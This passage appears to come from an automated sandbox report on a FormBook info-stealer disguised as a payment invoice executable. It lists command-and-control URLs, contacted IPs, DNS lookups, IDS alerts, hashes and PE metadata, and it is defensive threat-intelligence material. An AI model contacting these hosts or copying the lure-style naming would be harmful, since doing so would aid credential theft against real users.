                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.long9000.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixexplorer.exe, 00000009.00000002.748643610.000000000561F000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.long9000.com/blr/www.soheilvaseghi.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.zomapa.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.fonts.comPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.sandoll.co.krPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.zomapa.com/blr/www.carbeloy.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.carbeloy.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.sakkal.comPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    unknown
                                                    http://www.carbeloy.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.kathrynbaierling.com/blr/www.na230.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.apache.org/licenses/LICENSE-2.0Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                      high
                                                      http://www.fontbureau.comPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.jasa-software.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.olgadalila.com/blr/www.zomapa.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.cvmjqcid.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.soheilvaseghi.com/blr/www.gannahealing.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.cvmjqcid.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.soheilvaseghi.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.stanchilo.com/blr/www.yoshiyama-potager.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        http://www.fontbureau.com/designers/cabarga.htmlNPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.jaemagreci.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.carbeloy.com/blr/www.prodhealth.siteexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.founder.com.cn/cnPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.sweetpopntreatz.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.kanaai.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.jiyu-kobo.co.jp/Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          unknown
                                                          http://www.long9000.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://www.fontbureau.com/designers8Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://www.olgadalila.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.jaemagreci.com/blr/www.sweetpopntreatz.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://www.stanchilo.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown

                                                            Contacted IPs


                                                            Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 210.152.86.132 | unknown | Japan | 4694 | IDCFIDCFrontierIncJP | true |
| 198.52.105.123 | unknown | United States | 35916 | MULTA-ASN1US | true |
| 50.116.112.43 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | true |
| 176.74.27.137 | unknown | United Kingdom | 38719 | DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU | true |
| 35.246.6.109 | unknown | United States | 15169 | GOOGLEUS | true |
| 34.102.136.180 | unknown | United States | 15169 | GOOGLEUS | true |
| 185.199.108.153 | unknown | Netherlands | 54113 | FASTLYUS | true |
| 164.155.144.220 | unknown | South Africa | 26484 | IKGUL-26484US | true |
| 198.27.88.111 | unknown | Canada | 16276 | OVHFR | true |

                                                            General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 356535
Start date: 23.02.2021
Start time: 09:45:52
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 49s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 36
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winEXE@7/1@9/9
EGA Information: Failed
HDC Information:
• Successful, ratio: 65.3% (good quality ratio 60%)
• Quality average: 71.9%
• Quality standard deviation: 31.2%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 79
• Number of non-executed functions: 148
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
Warnings:
                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                            • Excluded IPs from analysis (whitelisted): 13.64.90.137, 52.147.198.201, 92.122.145.220, 168.61.161.212, 184.30.20.56, 51.104.139.180, 104.42.151.234, 8.248.139.254, 8.248.131.254, 67.27.157.254, 67.27.157.126, 8.248.147.254, 20.54.26.129, 51.104.144.132, 92.122.213.247, 92.122.213.194, 52.155.217.156
                                                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                            Simulations

                                                            Behavior and APIs

| Time | Type | Description |
|---|---|---|
| 09:46:53 | API Interceptor | 1x Sleep call for process: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe modified |

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            Match   Associated Sample Name / URL   SHA 256   Detection   Link   Context

                                                            Domains

                                                            Match   Associated Sample Name / URL   SHA 256   Detection   Link   Context

                                                            ASN

                                                            Match   Associated Sample Name / URL   SHA 256   Detection   Link   Context

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.log
                                                            Process:C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1314
                                                            Entropy (8bit):5.350128552078965
                                                            Encrypted:false
                                                            SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                            MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                            SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                            SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                            SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):6.417043661042723
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            • DOS Executable Generic (2002/1) 0.01%
                                                            File name:Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
                                                            File size:716288
                                                            MD5:5f1c9c4a7bc24c3d39a5a3834ba7bb8e
                                                            SHA1:0e9a21a75675c636438f50d90bb5f7ec9a689275
                                                            SHA256:5d5d64a87a5d888443e8d7a25046922fa4a39fe5952a45635dd66321e616bb14
                                                            SHA512:a85b3076ee72e71532e60d84e6827b6c83ddaa2b1f0b287fac373eff495f67600a4e8d47459c6253538f0d9d770c004f41833e75d630d12047442ed3a9033894
                                                            SSDEEP:12288:IQ4DA80ZwvXdU9aLBdf3INYI1r1VJjRXRePHp:8DUZ22ODklZRYPHp
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F4`..............P......H........... ........@.. .......................`............@................................

                                                            File Icon

                                                            Icon Hash:020b05151c020900

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x47c38a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp:0x60344694 [Tue Feb 23 00:04:36 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:v4.0.30319
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al

                                                            Data Directories

                                                            Name                                  Virtual Address  Virtual Size  Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT          0x7c338          0x4f          .text
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE        0x7e000          0x344e8       .rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb4000          0xc           .reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                            Sections

                                                            Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                                            .text   0x2000           0x7a390       0x7a400   False     0.763266471754   data       7.45974448722   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                            .rsrc   0x7e000          0x344e8       0x34600   False     0.0788148866348  data       1.84613555516   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .reloc  0xb4000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            Name           RVA      Size     Type                                                                                                                           Language  Country
                                                            RT_ICON        0x7e130  0x33428  dBase IV DBT, block length 6144, next free block index 40, next free block 4294967295, next used block 4294967295
                                                            RT_GROUP_ICON  0xb1558  0x14     data
                                                            RT_VERSION     0xb156c  0x36c    data
                                                            RT_MANIFEST    0xb18d8  0xc0f    XML 1.0 document, UTF-8 Unicode (with BOM) text

                                                            Imports

                                                            DLL          Import
                                                            mscoree.dll  _CorExeMain

                                                            Version Infos

                                                            Description       Data
                                                            Translation       0x0000 0x04b0
                                                            LegalCopyright    Copyright 2018
                                                            Assembly Version  1.0.0.0
                                                            InternalName      RegistryTimeZoneInformation.exe
                                                            FileVersion       1.0.0.0
                                                            CompanyName
                                                            LegalTrademarks
                                                            Comments
                                                            ProductName       RegisterVB
                                                            ProductVersion    1.0.0.0
                                                            FileDescription   RegisterVB
                                                            OriginalFilename  RegistryTimeZoneInformation.exe

                                                            Network Behavior

                                                            Snort IDS Alerts

                                                            Timestamp                 Protocol  SID      Message                               Source Port  Dest Port  Source IP       Dest IP
                                                            02/23/21-09:48:35.246251  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49736        80         192.168.2.3     50.116.112.43
                                                            02/23/21-09:48:35.246251  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49736        80         192.168.2.3     50.116.112.43
                                                            02/23/21-09:48:35.246251  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49736        80         192.168.2.3     50.116.112.43
                                                            02/23/21-09:48:54.032862  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49739        80         192.168.2.3     34.102.136.180
                                                            02/23/21-09:48:54.032862  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49739        80         192.168.2.3     34.102.136.180
                                                            02/23/21-09:48:54.032862  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49739        80         192.168.2.3     34.102.136.180
                                                            02/23/21-09:48:54.174190  TCP       1201     ATTACK-RESPONSES 403 Forbidden        80           49739      34.102.136.180  192.168.2.3
                                                            02/23/21-09:49:37.345758  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49748        80         192.168.2.3     185.199.108.153
                                                            02/23/21-09:49:37.345758  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49748        80         192.168.2.3     185.199.108.153
                                                            02/23/21-09:49:37.345758  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49748        80         192.168.2.3     185.199.108.153
                                                            02/23/21-09:49:57.812186  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49752        80         192.168.2.3     176.74.27.137
                                                            02/23/21-09:49:57.812186  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49752        80         192.168.2.3     176.74.27.137
                                                            02/23/21-09:49:57.812186  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49752        80         192.168.2.3     176.74.27.137
                                                            02/23/21-09:50:39.257393  TCP       2031453  ET TROJAN FormBook CnC Checkin (GET)  49754        80         192.168.2.3     164.155.144.220
                                                            02/23/21-09:50:39.257393  TCP       2031449  ET TROJAN FormBook CnC Checkin (GET)  49754        80         192.168.2.3     164.155.144.220
                                                            02/23/21-09:50:39.257393  TCP       2031412  ET TROJAN FormBook CnC Checkin (GET)  49754        80         192.168.2.3     164.155.144.220

                                                            Network Port Distribution

                                                            TCP Packets

                                                            Timestamp  Source Port  Dest Port  Source IP  Dest IP

                                                            UDP Packets

                                                            Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                            Feb 23, 2021 09:49:33.882205009 CET6361953192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:33.941507101 CET53636198.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:35.224967957 CET6493853192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:35.285001993 CET53649388.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:35.759891033 CET6194653192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:35.809756994 CET53619468.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:36.397238970 CET6491053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:36.455867052 CET53649108.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:37.063218117 CET5212353192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:37.095645905 CET5613053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:37.148777008 CET53561308.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:37.300690889 CET53521238.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:37.957732916 CET5633853192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:38.017211914 CET53563388.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:38.840532064 CET5942053192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:38.897531986 CET53594208.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:39.493510008 CET5878453192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:39.553536892 CET53587848.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:49:57.674310923 CET6397853192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:49:57.756051064 CET53639788.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:50:18.129417896 CET6293853192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:50:18.295779943 CET53629388.8.8.8192.168.2.3
                                                            Feb 23, 2021 09:50:38.837822914 CET5570853192.168.2.38.8.8.8
                                                            Feb 23, 2021 09:50:39.050357103 CET53557088.8.8.8192.168.2.3

                                                            DNS Queries

                                                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                            Feb 23, 2021 09:47:53.216571093 CET | 192.168.2.3 | 8.8.8.8 | 0xaf8 | Standard query (0) | www.kanaai.com | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:48:13.808693886 CET | 192.168.2.3 | 8.8.8.8 | 0xa1fa | Standard query (0) | www.cvmjqcid.com | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:48:34.894269943 CET | 192.168.2.3 | 8.8.8.8 | 0xa314 | Standard query (0) | www.jaemagreci.com | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:48:53.921508074 CET | 192.168.2.3 | 8.8.8.8 | 0xc403 | Standard query (0) | www.sweetpopntreatz.com | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:49:16.361803055 CET | 192.168.2.3 | 8.8.8.8 | 0x6197 | Standard query (0) | www.long9000.com | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:49:37.063218117 CET | 192.168.2.3 | 8.8.8.8 | 0xdf87 | Standard query (0) | www.soheilvaseghi.com | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:49:57.674310923 CET | 192.168.2.3 | 8.8.8.8 | 0xa100 | Standard query (0) | www.gannahealing.com | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:50:18.129417896 CET | 192.168.2.3 | 8.8.8.8 | 0xf04b | Standard query (0) | www.olgadalila.com | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:50:38.837822914 CET | 192.168.2.3 | 8.8.8.8 | 0xcfd4 | Standard query (0) | www.zomapa.com | A (IP address) | IN (0x0001)

                                                            DNS Answers

                                                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                            Feb 23, 2021 09:47:53.287456036 CET | 8.8.8.8 | 192.168.2.3 | 0xaf8 | No error (0) | www.kanaai.com | www13.wixdns.net |  | CNAME (Canonical name) | IN (0x0001)
                                                            Feb 23, 2021 09:47:53.287456036 CET | 8.8.8.8 | 192.168.2.3 | 0xaf8 | No error (0) | www13.wixdns.net | balancer.wixdns.net |  | CNAME (Canonical name) | IN (0x0001)
                                                            Feb 23, 2021 09:47:53.287456036 CET | 8.8.8.8 | 192.168.2.3 | 0xaf8 | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net |  | CNAME (Canonical name) | IN (0x0001)
                                                            Feb 23, 2021 09:47:53.287456036 CET | 8.8.8.8 | 192.168.2.3 | 0xaf8 | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net |  | CNAME (Canonical name) | IN (0x0001)
                                                            Feb 23, 2021 09:47:53.287456036 CET | 8.8.8.8 | 192.168.2.3 | 0xaf8 | No error (0) | td-balancer-euw2-6-109.wixdns.net |  | 35.246.6.109 | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:48:14.101805925 CET | 8.8.8.8 | 192.168.2.3 | 0xa1fa | No error (0) | www.cvmjqcid.com | cvmjqcid.com |  | CNAME (Canonical name) | IN (0x0001)
                                                            Feb 23, 2021 09:48:14.101805925 CET | 8.8.8.8 | 192.168.2.3 | 0xa1fa | No error (0) | cvmjqcid.com |  | 210.152.86.132 | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:48:35.082828999 CET | 8.8.8.8 | 192.168.2.3 | 0xa314 | No error (0) | www.jaemagreci.com | jaemagreci.com |  | CNAME (Canonical name) | IN (0x0001)
                                                            Feb 23, 2021 09:48:35.082828999 CET | 8.8.8.8 | 192.168.2.3 | 0xa314 | No error (0) | jaemagreci.com |  | 50.116.112.43 | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:48:53.988495111 CET | 8.8.8.8 | 192.168.2.3 | 0xc403 | No error (0) | www.sweetpopntreatz.com | sweetpopntreatz.com |  | CNAME (Canonical name) | IN (0x0001)
                                                            Feb 23, 2021 09:48:53.988495111 CET | 8.8.8.8 | 192.168.2.3 | 0xc403 | No error (0) | sweetpopntreatz.com |  | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                            Feb 23, 2021 09:49:16.425479889 CET | 8.8.8.8 | 192.168.2.3 | 0x6197 | No error (0) | www.long9000.com |  | 198.52.105.123 | A (IP address) | IN (0x0001)
